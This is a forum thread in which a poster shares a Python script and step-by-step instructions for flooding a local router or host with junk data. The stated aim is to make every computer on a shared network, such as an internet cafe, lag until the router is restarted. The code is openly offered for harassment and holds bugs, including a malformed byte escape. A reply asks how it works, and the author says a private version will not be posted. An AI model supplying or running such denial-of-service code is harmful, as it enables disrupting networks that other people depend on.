Lag Any local network[Updated]

anath3ma

So i will give you a program that i have made before some days

How u can use it?

Ex u play on a net cafe ok and u wanna brake some nerves

So u just run this program, add  one active website ip and thats it every computer who was connected with the same router with you, gonna lag till death

[NEW LINK]

file download [*]http://rapidshare.com/files/145004032/pingerzer0.py.html

Code here[*]

[glow=blue,2,300]from socket import *

import random

import string

import time

g = socket(AF_INET,SOCK_STREAM)

def findzer0():

print ('*****************************************************')

print ('Now Searching For Active Ips... ')

print ('Maybe This Cane Be Slow!')

for i in range(0,10000):

arg1 = random.sample(xrange(192), 4)

mod1 = string.strip(str(arg1))

mod2 = mod1.replace(',','.')

mod3 = mod2.replace('[','')

mod4 = mod3.replace(']','')

mod5 = mod4.replace(' ','')

ip = mod5

time.sleep(7)

try:

g.connect((ip,int(80)))

print 'Ip Connected To The Port :', ip

g.close()

except:

print ip , ' Ip Cant Connect Seems To Dont Exist'

def custom():

host_=raw_input('Give An Active Ip :')

for i in range(1,40):#generate 40 Active Sockets!!!

i = socket(AF_INET,SOCK_STREAM)

print ('Socket Created :',i)

i.connect((host_,int(80)))

print ('Supost The Sockets Are Created Ok[* ]')

print ('Lets Lag Everything...')

while 1: #null packet

i.send('\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff')

print ('Multy Socket EtherNet Pinger')

print ('Made By DarkInjection[* ]')

print ('Lag The Local NetWrok!')

print ('Note This Will Slow Your Download Speed...')

chs = raw_input('Wanna Search For Ips Or Set An Active Custom(S for search C for an active ip):')

if chs == str('S'):

findzer0()

else:

custom()[/glow]

Tutorial here[*]

First download python from here http://www.python.org/download/

install the python

now download the file

and open a cmd(im using linux atm so i will use terminal)[*]

screenshotji9.th.png

Next put the file on C:\

and then type in cmd cd c:\

after this the current directory will be change to C:\

so now u can just type pingerzer0.py like this[*]

screenshot1zf9.th.png

now u can choose what u want the program to start search for active ips or u can add ur ruter active ip

hit what u want enter the ip if u have select to add ur ip and thats it to fix this the ruter must restart else this gonna be a problem :P

[glow=green,2,300]try it at ur pc if u got ruter[/glow]

ANY ERROR CAN POSTED HERE ALSO NOTE THIS IS JUST A PUBLIC VER

PRIV WILL NOT BE POSTED :P

Its easy (at least for me) But

i dont get how this:

now u can choose what u want the program to start search for active ips or u can add ur ruter active ip

hit what u want enter the ip if u have select to add ur ip and thats it to fix this the ruter must restart else this gonna be a problem

can cause lag on a network

and why the PRIV WILL NOT BE POSTED ? if that is warez this should be 2 xD or is that there is something worst in the priv than in the public?

Any way i am gonna give a try to this and see what happend xD

UPDATED!

if u run the script u will understand what i mean

the program got 2 selections one to scan for active ip and the second to add a custom ip

so if you test it on ur network u will not be able to connect to any website or game so u need to restart your router

also priv will not gonna posted cos i dont want to post it 😉

Edited by Vision